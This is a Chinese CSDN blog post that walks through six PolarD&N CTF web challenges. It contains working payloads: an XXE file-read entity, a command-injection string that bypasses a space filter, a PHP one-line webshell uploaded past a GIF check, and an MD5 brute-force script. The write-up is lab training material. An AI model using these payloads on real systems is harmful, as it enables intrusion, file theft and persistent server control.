【PolarD&N】刷题记录3

最新推荐文章于 2024-10-31 15:30:00 发布
最新推荐文章于 2024-10-31 15:30:00 发布
阅读量379 收藏 5
点赞数 6
文章标签: 网络安全 web安全 web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67997381/article/details/137752788
版权

1.WEB xxe

1.打开实例,提示了flag所在的位置,直接访问看不到内容。除此之外还给了phpinfo,点击查看,注意到libxml版本为2.8.0,该版本存在xxe漏洞。

注:libxml2 2.9.0 到 2.9.8 版本存在XXE漏洞。

2.使用dirsearch扫一下,扫到了dom.php。

3.进入dom.php,发现了报错。

4.根据报错撰写payload然后发送,让flagggg.php中的信息以base64的形式回显出来。

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
       <!ELEMENT name ANY >
        <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php" >
    ]>
     <name>&xxe;</name>

5.查看响应。

6.base64解码一下。

完毕!

2.WEB 爆破

1.查看实例,发现是代码审计,简单分析一下。

输入的pass进行了MD5加密,然后检查密码的第2、15、18位字符是否相等,接下来计算密码的第2、15、18位字符的整数值,并判断它们的和是否等于密码的第32位字符的整数值。满足这些条件就可以拿到flag。

<?php
error_reporting(0);

if(isset($_GET['pass'])){
    $pass = md5($_GET['pass']);
    if(substr($pass, 1,1)===substr($pass, 14,1) && substr($pass, 14,1) ===substr($pass, 17,1)){
        if((intval(substr($pass, 1,1))+intval(substr($pass, 14,1))+substr($pass, 17,1))/substr($pass, 1,1)===intval(substr($pass, 31,1))){
            include('flag.php');
            echo $flag;
        }
    }
}else{
    highlight_file(__FILE__);

}
?>

2.根据条件进行爆破。

import hashlib 

dic = '0123456789qazwsxedcrfvtgbyhnujmikolp'  # 字符集

for a in dic:
    for b in dic:
        t = a + b  # 组合两个字符
        md5 = hashlib.md5(t.encode()).hexdigest()  # 对组合的字符进行 MD5 哈希,转换为 16 进制表示的字符串
        md5 = ''.join('0' if c.isalpha() else c for c in md5)  # 将 MD5 字符串中的字母替换为数字 0
        # 判断 MD5 哈希值的第 2、15、18 位字符是否相等
        if md5[1] == md5[14] and md5[14] == md5[17]:
            # 检查除数是否为零,避免零除错误
            if int(md5[1]) != 0:
                if ((int(md5[1]) + int(md5[14]) + int(md5[17])) / int(md5[1])) == int(md5[31]):
                    print(t)  
                    exit()

运行结果:

3.传参,拿flag。

3.WEB XFF

1.启动实例!

2.根据题目给的提示,抓包修改IP,拿下!!

4.WEB rce1

1.查看代码,分析一下。

<?php

$res = FALSE;

if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/ /", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

传入ip,如果 ip 参数值中不包含空格,则执行 ping 命令。

2.简答传一下看看,可以发现是有显示的。

3.下面就可以去试一试空格绕过,查看源代码拿到flag。

?ip=127.0.0.1|cat%09fllllaaag.php

5.WEB iphone

1.查看实例,根据给出的文字可以看到管理员菜单需要iphone或者ipad才能看到。

2.查看网页源代码,发现注释部分给了提示,给一个UA,也就是user-agent。

3.抓包,在user-agent中写iphone,拿下!

6.WEB ezupload

1.查看实例,经典的文件上传。上传个一句话木马查看一下,发现要GIF图片才能上传。

一句话木马:

<?php eval($_POST['a']);?>

2.修改一句话木马的后缀名,抓包后再改回去,然后上传。

3.蚁剑连接一下。

4.找到flag。

青青很OK
关注
PolarD&amp;N-CTF-web方向-困难_polard&amp;n 没人能拒绝猫猫 ctf(2)
2401_84263282的博客
05-04 676
横线中共20个字符,可以用四个phtml进行字符串逃逸,所以这样构造应该就能出答案了。那么我们构造payload:?passwd=;s:6:passwd;i:1;s:4:“sign”;然后就在源码中找到了flag。
PolarD&amp;N-CTF-web方向-困难_polard&amp;n 没人能拒绝猫猫 ctf
m0_61068088的博客
04-06 747
然后就得到了flag。
PolarD&N(swp)
果粒程
04-15 807
根据提示去找swp文件,首先了解什么是swp文件swp即swap(交换分区)的简写,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。类似于Windows的虚拟内存,就是当内存不足的时候,把一部分硬盘空间虚拟成内存使用,从而解决内存容量不足的情况。如果文件正常退出,则此文件自动删除。如果并没有对文件进行修改,而只是读取文件,是不会产生swp文件的.swp的产生1.当你用多个程序编辑同一个文件时。
polarD&N2023秋季个人挑战赛MISC
m0_61025358的博客
12-08 1629
CTF竞赛是安全圈喜闻乐见的竞赛模式,对于培养网络安全技术人才起到了很重要的作用。CTF起源于1996年DEFCON全球黑客大会,是Capture The Flag的简称。经过多年的发展,CTF这种比赛形式已经日益成熟。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。
PolarD&N靶场题解
qq_43423311的博客
03-23 2740
PolarD&N CTF靶场。
[PolarD&N]题解——03ret2syscall_32
2301_80238613的博客
10-13 233
决定利用gets()函数的溢出,去构造execve("/bin/sh", 0, 0)。存在ebx,ecx,edx连续的寄存器,选取连续的即可。题目名称:03ret2syscall_32。题目来源:PolarD&N靶场(是一个32位静态的题目!如有错误欢迎大佬指正!
Polar D&N misc_0和255
yufeng0990的博客
12-04 624
0和255 writeup 仅自己可见
搭建ctfd动态靶场
qq_35948609的博客
11-25 4328
搭建CTFd动态靶场
DriverManager 源码分析
u011385186的专栏
12-26 999
1. Class.forName("com.mysql.jdbc.Driver"); 在初始化的时候会执行注册当前Driver给DriverManager static { try { java.sql.DriverManager.registerDriver(new Driver()); } catch (SQLException
polarD&N2023东季个人挑战赛MISC
m0_61025358的博客
12-12 1315
CTF竞赛是安全圈喜闻乐见的竞赛模式,对于培养网络安全技术人才起到了很重要的作用。CTF起源于1996年DEFCON全球黑客大会,是Capture The Flag的简称。经过多年的发展,CTF这种比赛形式已经日益成熟。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。
PolarD&N CTF—小心有F射
m0_64447841的博客
10-12 253
仿射解密函数:F(x) = a-1(x - b) (mod m),其中a-1是a在Zm群的乘法逆元,m是字母的数量。3、即将纯文本字母的整数值乘以a,然后将b加到结果中,最后我们取模数m(也就是说,当解除以m时取余数,或者取掉字母的长度,直到得到小于该长度的数字)。拿到这个文本的第一时间是没有思路的,因为确实是我没见过的密码,但是仔细观察第一行字符串很像公式,就搜索了一下,然后就搜索到了这个密码。2)找到的明文字母的整数值后,对这些值执行计算,在此例中,所需的计算为(5x + 8);
PolarD&N】刷题记录2
青青很OK的博客
04-02 773
当通过POST方式传递name变量的值,会被存入到session中,会在/tmp目录下存储session的值。第二个file是文件包含,php文件会被执行,然后file那边过滤了base加密等方式。1.查看代码,提取精华:get请求让id=1,post请求jljcxy=flag。2.随便输入点东西,然后提交查询,发现没有东西。6.开始攻击,等待完成后按照长度排序,然后查看内容,获得flag。2.抓个包看看,发现了base32,解码发现是一个目录。1.查看页面,很经典的上传页面,上传个一句话木马看看。
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1915
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
PolarD&N】刷题记录
青青很OK的博客
03-26 885
空格绕过:<,<>,${IFS},$IFS,%20(space),%09(tab),$IFS$9,$IFS$1。所以需要先输入a=flag,这样就有了$a=$flag,再输入flag=a,把flag值拿回来。3.保存修改后的id,再去点击id修改为9的那款奶茶,获得flag。2.根据代码尝试绕过,查看根目录下的内容,发现了flag。明面上给的flag是一个虚假的flag,提交发现是错误的。看到了一个didi,联想到给的提示,改成yes后放包。前一个输入三个.一个/过滤后剩一个.与后面的./拼接。
PolarD&N MISC(简单)大礼包 :详细思路过程
2301_79355407的博客
03-20 1283
PolarD&N:MSIC简单部分大礼包详细解题过程(萌新)
小学期,第三场-下午:WEB_xxe
Pai_Space
06-29 478
小学期,第三场-下午:WEB_xxe
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8531
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024年自学手册 网络安全(黑客技术)
最新发布
2401_85027424的博客
10-31 940
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
10-29 1685
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值